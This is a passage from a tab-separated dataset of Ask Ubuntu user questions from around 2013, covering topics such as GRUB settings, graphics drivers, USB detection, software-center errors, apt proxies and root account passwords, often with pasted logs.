in range ( 128 ) ) 2013-11-10 22:31:02,268 - softwarecenter.db.update - info - skipping region restricted app : 'comentarios web ' ( not whitelisted ) 2013-11-10 22:31:02,769 - softwarecenter.db.update - info - skipping region restricted app : 'reearcandy ' ( not whitelisted ) 2013-11-10 22:31:04,821 - softwarecenter.db.update - info - skipping region restricted app : 'flaggame ' ( not whitelisted ) 2013-11-10 22:31:05,622 - softwarecenter.db.update - info - skipping region restricted app : 'bulleti d'esquerra de calonge i sant antoni ' ( not whitelisted ) 2013-11-10 22:31:08,352 - softwarecenter.ui.gtk3.app - info - software-center-agent finished with status 0 2013-11-10 22:31:08,353 - softwarecenter.db.database - info - reopen ( ) database 2013-11-10 22:31:08,353 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-11-10 22:33:32,319 - softwarecenter.backend - warning - _on_trans_error : org.freedesktop.policykit.error.failed : ( 'system-bus-name ' , { 'name ' : ':1.72 ' } ) : org.debian.apt.install-or-remove-packages 2013-11-10 22:36:01,818 - softwarecenter.backend - warning - daemon dies , ignoring : < apttransaction object at 0x48e4b40 ( aptdaemon+client+apttransaction at 0x645aaa0 ) > exit-failed 2013-11-10 22:36:01,820 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( )
375148	how do you use a fingerprint scanner on 13.10	i have a thinkpad t410s and i ca n't use the fingerprint scanner installed ? any suggestion ...
375150	dos games with dosbox running slow	i have amd e-450 1.65ghz , 4gb ddr3 ram , hd6320 laptop with dual boot ubuntu 13.04 and win 8.1 , my main gaming rig ( desktop pc ) is with win7 ( so i am not playing serious games on this laptop ) and for university i mostly use ubuntu ( unix and programming tasks ) , for some free time i found dosbox on ubuntu software center and tryed playing several games ( blood , syndicate wars ) and all of them lag like hell ( although on win 8.1 they work perfectly ) . so any suggestion how to solve the problem ? i am using drivers x.org ( in software settings > additional settings ) tryed proprietary ones but all screen colors was kinda strange and i could n't control brightness at all ... same dos games was lagging too .
375152	grub menu only appears on second boot	i edited my grub file so that the grub boot menu only appears when i press shift . when i try to load the menu , all i see is a flashing prompt . if i hard shutdown the computer and try again , it works fine . grub file : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet= '' true '' grub_timeout=0 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash nomodeset video=uvesafb : mode_option=1280x1024-24 , mtrr=3 , scroll=ywrap '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' grub_gfxmode=1280x1024 # grub_gfxpayload_linux=2560x1600 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 ''
375153	usb-live does not save files between sessions	i created a usb-stick with ubuntu , using the recommended tool `` startup disk creator '' and the image for ubuntu 13.10 . the very simple interface looks like this : there ca n't be much to misunderstand in this gui . i have chosen to create a usb stick with a live version of ubuntu , which will save files and settings from session to session , on the usb drive , right ? well , it just does n't save anything . i go in , create a file on desktop , restart and it 's gone . i did the whole procedure three times , i.e . first creating the usb , then testing if i could save . have i misunderstood something ?
375155	after installing ubuntu how do i know that all devices have their necessary drivers	in windows after a fresh install i go to the device manager to find out which devices have yellow question mark on them ie driver is missing what about ubuntu ? sometimes you cant even tell that the driver is missing cause the device function is not visible like co-processor or something like that in windows you can find out about similar devices using the device manager
375160	ca n't install ubuntu 13.10 from 12.04 lts	i have ubuntu 12.04 lts installed on my hp pavilion and i want to try 13.10 . when i try to boot into the livecd , i get the purple ubuntu splash screen , then a blackscreen where some text flashes ( to fast to see what it says ) then it goes to a black screen and stays there . i know the installation disc is not the problem because i 've successfully installed it on a different machine using the same disc . i 've been trying to troubleshoot the issue for a while now and no luck . i have a radeon hd 8250 card . i know it 's not much to go off of but any help would be greatly appreciated ! thanks !
375166	what is `` grub '' command/program ? does it tweak grub2 as well or only grub legacy	from my terminal : heer @ heer-latitude-d620 : ~ $ grub -- help the program 'grub ' is currently not installed . you can install it by typing : sudo apt-get install grub heer @ heer-latitude-d620 : ~ $
375167	how do i make plugins work in rhythmbox 2.99.1 ?	i would like to use coverflow and an equalizer in rhythmbox . so i downloaded the fossfreedom plugins and installed those i needed , but how can i make them work when i do n't have a toolbar with a plugin menu ? i do n't understan the following which is written in another post : `` look to activate the plugin via a tool menu option . '' where can i find this ? many thanks in advance
375174	how do i connect my 'lg km900 arena ' phone to ubuntu ?	how do i connect my 'lg km900 arena ' phone to ubuntu as a mass storage device ? when i connect the phone , i select mass-storage on the phone 's interface , and ubuntu recognizes the connection as '7.5gb filesystem ' , but i can not open it . help ? = ( if i ca n't do this i 'm going to have to switch back to windows xp , as i need to upload data to and from my phone regularly . i 've already lost âł500 just today because i needed to upload photos from my phone to close a deal . silly perhaps , but i did n't anticipate having any such problems . thanks . edit : anonymous @ anonymous-dell-dm051 : ~ $ tail -f /var/log/syslog nov 10 23:15:10 anonymous-dell-dm051 kernel : [ 20264.355611 ] sdb : nov 10 23:15:10 anonymous-dell-dm051 kernel : [ 20264.359794 ] sd 21:0:0:0 : [ sdb ] attached scsi removable disk nov 10 23:15:34 anonymous-dell-dm051 kernel : [ 20288.821533 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:84:9c : a6:31:3b : fe:08:00 src=192.168.1.1 dst=224.0.0.1 len=36 tos=0x00 prec=0x00 ttl=1 id=0 df proto=2 nov 10 23:15:50 anonymous-dell-dm051 aptdaemon : info : quitting due to inactivity nov 10 23:15:50 anonymous-dell-dm051 aptdaemon : info : quitting was requested nov 10 23:15:50 anonymous-dell-dm051 dbus [ 789 ] : [ system ] activating service name='org.debian.apt ' ( using servicehelper ) nov 10 23:15:51 anonymous-dell-dm051 aptdaemon : info : initializing daemon nov 10 23:15:51 anonymous-dell-dm051 dbus [ 789 ] : [ system ] successfully activated service 'org.debian.apt ' nov 10 23:15:51 anonymous-dell-dm051 aptdaemon.packagekit : info : initializing packagekit compat layer nov 10 23:16:25 anonymous-dell-dm051 kernel : [ 20339.998133 ] usb 1-7 : usb disconnect , device number 24 nov 10 23:16:48 anonymous-dell-dm051 kernel : [ 20362.464028 ] usb 5-1 : new full-speed usb device number 12 using uhci_hcd nov 10 23:16:48 anonymous-dell-dm051 kernel : [ 20362.636079 ] usb 5-1 : new usb device found , idvendor=1004 , idproduct=6018 nov 10 23:16:48 anonymous-dell-dm051 kernel : [ 20362.636087 ] usb 5-1 : new usb device strings : mfr=1 , product=2 , serialnumber=3 nov 10 23:16:48 anonymous-dell-dm051 kernel : [ 20362.636091 ] usb 5-1 : product : lge usb device nov 10 23:16:48 anonymous-dell-dm051 kernel : [ 20362.636095 ] usb 5-1 : manufacturer : lg nov 10 23:16:48 anonymous-dell-dm051 kernel : [ 20362.636098 ] usb 5-1 : serialnumber : 352154033827378 nov 10 23:16:48 anonymous-dell-dm051 kernel : [ 20362.652895 ] scsi22 : usb-storage 5-1:1.0 nov 10 23:16:48 anonymous-dell-dm051 mtp-probe : checking bus 5 , device 12 : `` /sys/devices/pci0000:00/0000:00:1d.3/usb5/5-1 '' nov 10 23:16:48 anonymous-dell-dm051 mtp-probe : bus : 5 , device : 12 was not an mtp device nov 10 23:16:48 anonymous-dell-dm051 kernel : [ 20362.936063 ] usb 5-1 : usb disconnect , device number 12 nov 10 23:16:49 anonymous-dell-dm051 kernel : [ 20364.076024 ] usb 1-7 : new high-speed usb device number 26 using ehci-pci nov 10 23:16:49 anonymous-dell-dm051 kernel : [ 20364.209810 ] usb 1-7 : new usb device found , idvendor=1004 , idproduct=5760 nov 10 23:16:49 anonymous-dell-dm051 kernel : [ 20364.209817 ] usb 1-7 : new usb device strings : mfr=1 , product=2 , serialnumber=6 nov 10 23:16:49 anonymous-dell-dm051 kernel : [ 20364.209822 ] usb 1-7 : product : lge mass storage device nov 10 23:16:49 anonymous-dell-dm051 kernel : [ 20364.209825 ] usb 1-7 : manufacturer : lge nov 10 23:16:49 anonymous-dell-dm051 kernel : [ 20364.209829 ] usb 1-7 : serialnumber : 000000000001 nov 10 23:16:49 anonymous-dell-dm051 kernel : [ 20364.210985 ] scsi23 : usb-storage 1-7:1.0 nov 10 23:16:49 anonymous-dell-dm051 mtp-probe : checking bus 1 , device 26 : '' /sys/devices/pci0000:00/0000:00:1d.7/usb1/1-7 '' nov 10 23:16:49 anonymous-dell-dm051 mtp-probe : bus : 1 , device : 26 was not an mtp device nov 10 23:16:50 anonymous-dell-dm051 kernel : [ 20365.208845 ] scsi 23:0:0:0 : direct-access lge_inc sdmmc_2controler 1.00 pq : 0 ansi : 0 nov 10 23:16:50 anonymous-dell-dm051 kernel : [ 20365.210003 ] sd 23:0:0:0 : attached scsi generic sg2 type 0 nov 10 23:16:50 anonymous-dell-dm051 kernel : [ 20365.210581 ] sd 23:0:0:0 : [ sdb ] 14655488 512-byte logical blocks : ( 7.50 gb/6.98 gib ) nov 10 23:16:50 anonymous-dell-dm051 kernel : [ 20365.214242 ] sd 23:0:0:0 : [ sdb ] write protect is off nov 10 23:16:50 anonymous-dell-dm051 kernel : [ 20365.214251 ] sd 23:0:0:0 : [ sdb ] mode sense : 03 00 00 00 nov 10 23:16:50 anonymous-dell-dm051 kernel : [ 20365.216108 ] sd 23:0:0:0 : [ sdb ] write cache : disabled , read cache : enabled , does n't support dpo or fua nov 10 23:16:50 anonymous-dell-dm051 kernel : [ 20365.227124 ] sdb : nov 10 23:16:50 anonymous-dell-dm051 kernel : [ 20365.231207 ] sd 23:0:0:0 : [ sdb ] attached scsi removable disk nov 10 23:17:01 anonymous-dell-dm051 cron [ 12767 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) nov 10 23:17:39 anonymous-dell-dm051 kernel : [ 20414.139064 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:84:9c : a6:31:3b : fe:08:00 src=192.168.1.1 dst=224.0.0.1 len=36 tos=0x00 prec=0x00 ttl=1 id=0 df proto=2 if you could tell me how i 'm supposed to display this whole block as code without indenting each line individually i 'd appreciate that .
375176	ubuntu 12.04 2d hibernatization	i 'm pretty noob in linux os . i chose ubuntu to start with , because is most user friendly . but i ca n't make him go to hibernate . i have 2 gb ram and 4 gb swap , i follow the instructions to enable hibernate but still nothing . screen go black for moment and after that it is turn on again . what can i do ?
375181	how does voffset work in conky ?	i 'm trying to tweak a .conkyrc ( the weather bit of this one ) that includes ( not quite ) this line : $ { image ~/.conky/google-now/images/humidity.png -p 0,155 -s 15x15 } $ { goto 35 } some stuff $ { voffset 15 } the -p 0,155 positions the image variable . i read the documentation for goto , i know that goto 35 prints the next element at position 35 but i do n't quite know what that means . the voffset pushes the text down , but setting voffset to 155 does n't seem to push the text down to the image . how do i line them up ?
375182	xcfa segfaults in 13.10	i happen to like the program xcfa for cd ripping . however , after upgrading from 13.04 to 13.10 , i now get a segmentation fault ( core dumped ) upon executing the program from the command line . dmesg has the following unhelpful output : [ 7816.949156 ] xcfa [ 5168 ] : segfault at 0 ip b6b5abfa sp bfbbc778 error 4 in libc-2.17.so [ b6a13000+1ae000 ] any ideas how to solve this ? reinstalling has not helped .
375184	graphics corrupt after upgrading from 12.04 to 12.10	i upgraded 12.04 lts to 12.10. after rebooting , my screen become black . my machine is dell inspiron 3521 .
375185	hardware question ; booting ubuntu off of usb flash drive ?	i 'm currently running ubuntu off of a usb 3.0 flash drive on my laptop , and i have another usb 3.0 flash drive i use for storing larger files that i need to access and whatnot . but the issue is that both of the usb 3.0 flash drives do n't fit next to each other at all , so i 'm forced to use another usb 2.0 port located in a different spot on my laptop . now my question is that if i use a usb 3.0 hub will that slow my connections down at all ? or cause some sort of interference ? another question i had which i was unable to find anywhere on the internet is if there was a usb 3.0 hub with more than one upstream connection ? thanks for your time !
375188	partial upgrade on 13.10 -- how to revert to older version	did the upgrade to 13.10 . install froze on libthai and had to force a reboot . after reboot , logged in and only see home folder . need help . do not want to reinstall and lose all data if i have to .
375196	dota 2 suddenly loses frame rate	i recently installed dota 2 on ubuntu 13.10 and it has been running well . the only problem is that suddenly the game loses frame rate . the movements loses the smoothness . after sometime it just returns to normal . does anyone know how to fix this issue ?
375202	ubuntu 12.04 wo n't detect my external monitor and nvidia-xconfig does n't work	ubuntu wo n't detect my external monitor . i 'm running ubuntu on a lenovo thinkpad w530 with nvidia corporation gk107glm [ quadro k1000m ] . i 've been told to run nvidia-settings , but when i try running it , i get the following : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . when i do so , i get a 640x480 resolution . additionally , when i run nvidia-settings again , i get the same error message . what can i do to fix this ? update : i upgraded to ubuntu 14.04 and it works now .
375206	opengl apps ( games ) disappear after leaving fullscreen	i 've been trying to play some linux supported games on ubuntu 12.04 using steam ( mostly dota 2 ) and i 've been having the same problem every time with every game . as soon as i alt-tab out of fullscreen mode the game just vanishes . its still running in the background , it still shows up on the system monitor but i have no way of accessing the game again . it does n't show on the task bar , does n't show on alt-tabs ... just weird . granted , i am a complete linux noob ( as in i google absolutely everything i do ) so i might be missing something incredibly obvious here ... o.o
375208	software center : invalid or out of range for property 'value ' of type 'gint	hey guys so my software center wo n't install any apps , and its making my entire computer freeze this is what it says when i type software-center lacy @ lacy : ~ $ software-center 2013-11-10 15:47:13,139 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-11-10 15:47:13,955 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-11-10 15:47:13,957 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2013-11-10 15:47:13,993 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2013-11-10 15:47:13,992 - root - error - could not find any typelib for launchpadintegration 2013-11-10 15:47:14,207 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) /usr/lib/python2.7/dist-packages/gi/overrides/glib.py:532 : warning : value `` 101.000000 '' of type 'gdouble ' is invalid or out of range for property 'value ' of type 'gint' return super ( maincontext , self ) .iteration ( may_block ) 2013-11-10 15:47:29,480 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/share/software-center/softwarecenter/utils.py ' , 271 , 'get_title_from_html ' ) ' 2013-11-10 15:47:29,480 - root - warning - failed to parse : ' < div style= '' background-color : # 161513 ; width:1680px ; height:200px ; '' > < div style= '' background : url ( '/site_media/exhibits/2013/09/aamfp_leaderboard_700x200_1.jpg ' ) top left no-repeat ; width:700px ; height:200px ; '' > < /div > < /div > ' ( 'ascii ' codec ca n't encode character u'\xa0 ' in position 70 : ordinal not in range ( 128 ) ) 2013-11-10 15:47:45,309 - softwarecenter.db.utils - info - software-center-agent finished with status 0 /usr/bin/software-center:184 : warning : value `` 101.000000 '' of type 'gdouble ' is invalid or out of range for property 'value ' of type 'gint' gtk.main ( ) lacy @ lacy : ~ $
375212	chromebook dual boot issue	i have my acer c710 chromebook duel-booted with ubuntu 12.04 lts and the command line to switch the boot order from chrome-os to ubuntu is not having any effect i will enter the command in the chrome-os development console and then reboot it and it enters chrome os again . i have tried everything i can to get it to boot into ubuntu and it is not working the command i am entering is , sudo cgpt add -i 6 -p 5 -s 1 /dev/sda . i have not had any issues with this in the past and was wondering what is going wrong .
375216	opening cursor files in a graphics editor ?	i 'm looking at /usr/share/icons/dmz-white/cursors , and there is : $ tree -s /usr/share/icons/dmz-white/ /usr/share/icons/dmz-white/ ├── [ 4096 ] cursors │ ├── [ 14 ] 00008160000006810000408080010102 - > v_double_arrow ... │ ├── [ 5 ] 9d800788f1b08800ae810202380a0822 - > hand2 │ ├── [ 8 ] arrow - > left_ptr │ ├── [ 15776 ] bd_double_arrow │ ├── [ 15776 ] bottom_left_corner │ ├── [ 15776 ] bottom_right_corner │ ├── [ 15776 ] bottom_side ... ... a bunch of files without extension , that gimp can not open . is there an editor where these files can be opened - or at least a converter to something like .png ? i can note that imagemagick display also failed to open these files .
375219	stty for remote access	i 've configured in my console with stty intr ^j instead of ctrl+c and i 'm very comfortable with that . but when i 'm doing remote access ( ssh and etc ) the ctrl+j neither ctrl+c does n't work . is there a fix to use ctrl+j as usuall ctrl+c ?
375220	unity does n't load showing error	my pc has a graphic card less than 100mb can still ubuntu 13.10 work.i got a answer of previous question of installing ccsm but it shows error pakage data not found how to fix this issue
375221	my computer is stuck on login screen	i setup ubuntu 3.10 and now i am logged in , and it wo n't do anything ! how do i start ubuntu ?
375229	toshiba n200 wo n't output to tv through vga	i just installed the latest version of ubuntu . i 'm attempting to watch movies through my netbook on the tv using the vga port . when this netbook had windows installed it worked fine , but i ca n't figure out how to do it with ubuntu . when i plug the vga cable in , the tv does n't seem to get any signal . any ideas ?
375230	upgrade from 13.04 to 13.10 fails early on	i am attempting to upgrade from 13.04 to 13.10 . right after the early on message downloading file 1 of 2 and then it goes on to 2 of 2 the upgrade process dies . a reboot and attempt again fails at the same point . this is a 64 bit system with an ssd for the boot drive . if memory serves me when attempting to do same from the command line i saw some dbus error which may or may not be related . any help much appreciated . obviously i could attempt a fresh install which would likely succeed .
375234	after installing ubuntu 12.10 , windows 8.1 disappears from start up menu	i 'm very new to ubuntu ( 12.10 ) , so i apologise if i 'm not clear at any point ! i had a windows 8 ( upgraded to windows 8.1 ) and was fed up with it , so i converted to ubuntu 12.10 . i 'd hoped to dual boot to at least get the benefit of both worlds . i created a partition for it in windows and installed from a liveusb key ( and installed into that parition ) . so now ubuntu works great , but windows 8.1 no longer shows up on the start up screen ( where you theoretically pick which os you want to boot in ) . i was going to try `` boot repair '' as mentioned here and restore mbr , but i do n't want to start messing around with stuff i 'm not entirely clear with . edit : for any of those who stumble here with the same problem , i just read here that a user wiped out his windows partition by accident ... i checked my own computer with sudo fdisk -l and there 's only one device boot ( dev/sda1 ) . i 'm not an expert , but i 'm guessing that means windows has been written over .
375237	sound in ubuntu 12.10 on chromebook	i 've got an hp chromebook 14 that i 've rooted and installed ubuntu via crouton ( upgraded to 12.10 ) and most things are working nicely . one issue that i am having trouble solving relates to sound . i 've got sound output that i can control via the individual app ( e.g . youtube ) , but when trying to control the volume via the built-in xfce4-mixer , i get the following error : gstreamer was unable to detect any sound devices . some sound system specific gstreamer packages may be missing . it may also be a permissions problem . opening a terminal , i can run the alsamixer and control the volume levels . it is reporting back that the card is cras . i 'd love to be able to do it from xfce and the built-in mixer . i 've tried re-installing the gstreamer packages , but no luck . it seems like i am close but not sure where to go from here . on a maybe unrelated note , plugging headphones into the headphone jack in ubuntu also does not stop the sound from coming from the speakers and nothing comes through the headphones . switching back to chromeos , everything works as expected , so i think that it 's a driver issue .
375241	i want to install wine without an internet connetion ?	i have ubuntu 12.10 , and i do n't have any internet connection on my pc . please give me a link for a deb package and its dependencies how can i install wine without internet ?
375242	what is meant by `` no password set '' for root account ( and otthers ) ?	several years back , we were more accustomed to changing to the root account using the su command . first , we switched to the root account , and then executed those root commands . now we are more accustomed to using the sudo command . but we know that the root account is there . we can readily find the home directory of user root . $ ls -ld /root/ drwx -- -- -- 18 root root 4096 oct 22 17:21 /root/ now my point is , it is stated that `` the root password in ubuntu is left unset '' . please see the answers to this question . most of the answers have something to this effect in the first paragraph . one or two answers further state that `` the account is left disabled '' . now my ( primary ) questions are , what is meant by an unset password ? is it blank ? is it null ? or something else more cryptic ? how does the account becomes enabled once i set password for it ? ( sudo password root ) in order get a better understanding , i checked the /etc/shadow file . since i have already set a password for the root account , i can no longer see what is there ( encrypted password ) . so , i created another account and left it disabled . the corresponding entry in the /etc/shadow file is , testpassword : ! :16020:0:99999:7 : : : now perhaps my above queries need to be changed to , what does an ! in password field mean ? other encrypted passwords are those very long cryptic strings . how come this encrypted form is only one character long ? and does an account become disabled if i put an ! in the ( encrypted ) password field ?
375243	ubuntu 12.04.3 64 bit with nemo 2.0.x no thumbnails	i have strange problem with thumbnails in my ubuntu machine . i was using ubuntu with cinnamon 1.8 from stable ppa and it was good but then cinnamon 2.0 came out with some broken packages uploaded to stable ppa nad things gone wrong ... anyway after few updates cinnamon started to work normaly except nemo - there are no thumbnails at all , only icons . i heve tried purging /.cache/thumbnails and .thumbnails folders but this does n't work . next i have changed permissions for those folders - that did n't helped either . then i 've set nemo as default file manager and desktop handler but with no result . what is weird - when i start nautilus and open some folder with images then close it and open same folder with nemo thumbnails appears but when i clean thumbnails directories there are no thumbnails again . it would be great if someone have some solution for this annoying nemo behavior because i really do n't want to resign from cinnamon . p.s . i have set preview options in nemo for always and no bigger files than 4gb so that is not the case .
375252	brightness not save , ubuntu 13.04	master ubuntu , ubuntu 13.04 always reset like not save brightnes . much people ask this question . please give me fix answer . i like ubuntu so much and fans ubuntu from any fans .
375256	how do i configure my dns server for a local network ?	hi i 'm configuring a dns server for a local network using bind9 , but i need to integrate all the services in the local network , i already have the web server in one of the computer and it work fine , but my dns only works in the same computer that 's installed , and i need that to work with all the computers in the network . does somebody know what to do in this case ?
375257	amd radeon hd 4000 series graphics card support	i have an amd radeon hd 4000 series graphics card in my computer which is running ubuntu 13.04 . my system is overheating and sometimes shuts down automatically because of the overheating . what is the solution for it as the fglrx driver is not supported due to an updated xorg ? do i need to go back to ubuntu 12.04 or any other operating systems that support these cards , or is there a way that i can use the proprietary graphics card driver for my graphics card in ubuntu 13.04 ?
375262	global menu not working on some apps like evince and nautilus	global menu does not work on evince , nautilus , etc , how can i get it back to these apps which should be compatible with global menu .
375263	ca n't listen to port 4445 ; sqlite3	so i have a dedicated machine running ubuntu 12.04 server with freepbx 2.9 . earlier i was attempting to familiarize myself with sql via sqlite3 , but i received this dreaded error : sqlite header and source version mismatch so i saw a possible fix was to remove sqlite3 from the system and re-install . i did , and i went to reload freepbx via : $ amportal restart and now it 's giving me this recurring error : ca n't listen to port 4445 it repeats every 5 or so seconds unless i log out and log back in . anyway , my question is this : is there anything i can do to fix this ? i tried re-installing sqlite3 , but i 'm not screwing with anything until i get the machine back like it was . any help is greatly appreciated ! apologies , braiam , this is the print-out from the lsof command : command pid user fd type device size/off node name perl 6773 asterisk 4u ipv4 560096 0t0 tcp *:4445 ( listen )
375269	web sites do not work when i am logged into google chrome or need to log in to google	this problem is really weird . if i log into google chrome , i can not use google to search . and i cant log in to sites like this one and stack overflow with my google account . the pages time out with `` no response from server '' type errors . if i use a windows pc on the same network it is fine , but in ubuntu or mint it fails . the problem started a month ago so i switched from mint to ubuntu with no improvement . when i search google ( not logged into chrome ) the results pages are usable . but if i log into chrome , i get a page of results that i ca n't click on unless i manually change the link . for example this link : https : //www.google.co.nz/url ? sa=t & rct=j & q= & esrc=s & source=web & cd=2 & cad=rja & ved=0cdgqjbawaq & url=http % 3a % 2f % 2fwww.nzherald.co.nz % 2fnews & ei=q2gauppmjmsnkwwu8yg4bw & usg=afqjcnerhzaw7khdojwr2jgiyl8ag5qcia & sig2=c5iadaysik8u0a1ljwq-yg & bvm=bv.56146854 , d.dgi fails to redirect , but if i open in a new tab and change the google.co.nz/ to google.com/ it will load . dns lookups are working fine using dig or nslookup to confirm . does any one have a clue as to what to try next ? this a now a fresh install of ubuntu 13.10 , but had the exact same problem on mint and a windows pc works fine ( how i am logged in now ) .
375270	git cloning for ubuntu kernel gave error : index-pack died of signal 9447381	my /usr/src is found empty . so i tried to install a fresh kernel . but was unsuccessful with some error . i did this : git clone git : //kernel.ubuntu.com/ubuntu/ubuntu-precise.git but it gave this error message : error : index-pack died of signal 9447381 ) , 802.20 mib | 88 kib/s fatal : index-pack failed my current kernel version is 3.8.13-bone20 # 1 in linux -ubuntu-armhf can anyone help me to solve this ?
375271	make vim reload file as soon as it changes on disk	i do n't want to have to keep reloaded a log file manually , i want to automatically see my logs as they come in . apparently , vim has this feature built in , something called autoread , but i ca n't get it to work in ubuntu i can run sudo vi ~/.vimrc to edit vim 's config file like so : set number set autoread the number argument works perfectly . autoread does n't work at all . any ideas or hacks ? i want vim to automatically scroll the bottom of the file when a file it 's viewing is updated as well .
375272	ubuntu asks password to unlock keyring	when i turn on the computer ubuntu asks for password to unlock keyring.why is this happening
375273	random flashing horizontal bars when using nvidia binary driver	i 'm having an interesting ( read : i 'm ready to pull my hair out because of this ) issue with my evga geforce 8400 gs graphics card under ubuntu . i 'm trying to use a dvi to hdmi converter that will also inject digital audio into the hdmi signal ( this one : http : //www.monoprice.com/product ? c_id=101 & cp_id=10114 & cs_id=1011405 & p_id=5369 & seq=1 & format=2 ) , and when that converter is in place , i get weird flashing horizontal bars on the screen . the interesting part is that this setup works just fine up until i install the nvidia binary drivers to get the full 1080p resolution out of the card , and also works just fine with other computers . i 've already tried swapping cables , etc . to no avail , which leads me to believe that it 's some incompatibility/misconfiguration between the nvidia drivers , this card , and the converter . here 's a short video of what i 'm talking about : http : //videobam.com/tqfno is there another driver i could try that would give me 1080p resolution and bypass this issue , or is there something obvious i 'm missing ? any ideas or help would be appreciated !
375275	apt-get not using http_proxy in ubuntu 13.10	i just updated from ubuntu 12.04 to 13.10 in 12.04 , i used to set up my http_proxy variable in .bashrc and then use apt-get as follows sudo -e apt-get update the -e option in sudo used to make the user environment variables available to sudo and apt-get would pick up the http_proxy variable . for some reason , this method is not working in 13.10 . i am repeatedly getting 407 proxy authentication required . does anybody know the reason why ? how do i solve this ? note : i know that the other way to enable proxy for apt-get is to change settings in apt.conf . i do n't want to do this as this will create a system wide setting . also , when i am using the system at home ( where there is no proxy ) , i will again have to go and change apt.conf . in the above solution , i would just have to drop the `` -e '' option in sudo and apt-get will just attempt to directly connect to the internet .
375278	how to disable mate/marco shadows in compositing	i have `` enable software compositing window manager '' on currently , which gives a nice alt-tab display , but i 'd like to disable the gaussian drop shadows around the window edges . ideally , i 'd like to control it per-window , but even a global disable would be nice . why ? it looks bad on a transparent , desktop console . ( this is on precise 12.04.3 with the mate repo added )
375279	ubuntu from external hard drive error	i 've previously installed ubuntu 13.10 with the `` usb universal installer '' into a 4gb usb , and it worked fine . now i want it to be in my old computers hard drive so i can save the files and use it as if it were the real operating system . i 'm using it as an external hdd . i followed the same steps than with usb ( download the iso and then using usb universal installer made it bootable ) but when i try to go into ubuntu ( after selecting ubuntu as the system i 'd like to use ) this appears : windows found a communication problem with a device connected to the equipment . the cause of this error may be the disconnection of the external device while in use , or the hardware is defective . if you keep getting this error message please get in touch with the manufacturer of the hardware . file : \ubuntu\winboot\wubildr.mbr state : \ 0xc00000e9 information : unexpected e/s error [ that 's what it says , its not exactly the same since i had to translate it ] can anyone help me out with this , i really do n't know if i had to do the same than with a usb , looked in all the forums but got even more confused as i read ( new at all of this ) . what does it mean , and if i did not install it correctly , how do i do it ? ps : the hard drive was always connected to the computer .
375281	left click of the mouse is not working in ubuntu 12.04 live os	the left click on the mouse is just not working in the live os of ubuntu 12.04 and so to open any thing i have to right click it and select open and if i am browsing the net i have to open it in a new tab or press enter to select the link and open it . plz help me out with a solution to solve this problem .
375282	usb device does not appear in ubuntu 13.04	i got a problem . when i 'm connecting my usb drive my drive does not apear in desktop i have run the command - dmesg | tail and the output is - [ 1178.937179 ] usb 3-2 : serialnumber : n85h8k1r [ 1178.938060 ] scsi10 : usb-storage 3-2:1.0 [ 1179.937197 ] scsi 10:0:0:0 : direct-access jetflash transcend 8gb 8.07 pq : 0 ansi : 4 [ 1179.939902 ] sd 10:0:0:0 : attached scsi generic sg3 type 0 [ 1179.940616 ] sd 10:0:0:0 : [ sdc ] 15679488 512-byte logical blocks : ( 8.02 gb/7.47gib ) [ 1179.941377 ] sd 10:0:0:0 : [ sdc ] write protect is off [ 1179.941382 ] sd 10:0:0:0 : [ sdc ] mode sense : 23 00 00 00 [ 1179.942066 ] sd 10:0:0:0 : [ sdc ] write cache : disabled , read cache : enabled , doesn't support dpo or fua [ 1179.950956 ] sdc : unknown partition table [ 1179.953080 ] sd 10:0:0:0 : [ sdc ] attached scsi removable disk what should i do now ? thanks
375284	how to edit ubuntu installation disc ?	how can i edit ubuntu iso and add custom apps like vlc and so on into it . is there any software that can help me
375286	how to create a script to check for internet connection ?	i 'm new to programming in linux . i started bitcoin mining using linux mint xfce 15 . i 'm really good following directions , just do n't know how to start . i need to create a script that can run every 15 minutes to check if there is a connection to the interet if there is no connection , restart wifi connection . my asus eee b202 is losing internet conection some how , eventhough wifi is connected . so to fix it i disconnect from wifi and reconnect again . with the script added as to a cron job , i can avoid doing that . thanks before hand .
375287	slow boot and battery problem in ubuntu 13.04	i 'm a new ubuntu user and loved using it . but i 'm now facing a problem using it . i.e. , battery draining very quickly . ( mine is dell inspiron 15 - 4gb ram - 500 hdd - amd radeon hd 7670 graphics . - dual boot alongside windows8 ) it will come around 3hrs in windows8 , but only 1:30 hr in ubuntu . i found that its defaultly using intel graphics and hence i installed amd catalyst drivers and also tlp power management tool and hurray i got around 4hr battery backup . but that joy disappeared very soon , since i installed amd catalyst drivers my ubuntu booting became very very slow and that 's very annoying . is there any solution that i can be solved both issues < or > i 've to sacrifice one for the other ! : ( will become your fan if you make my both issues solved ! thank you !
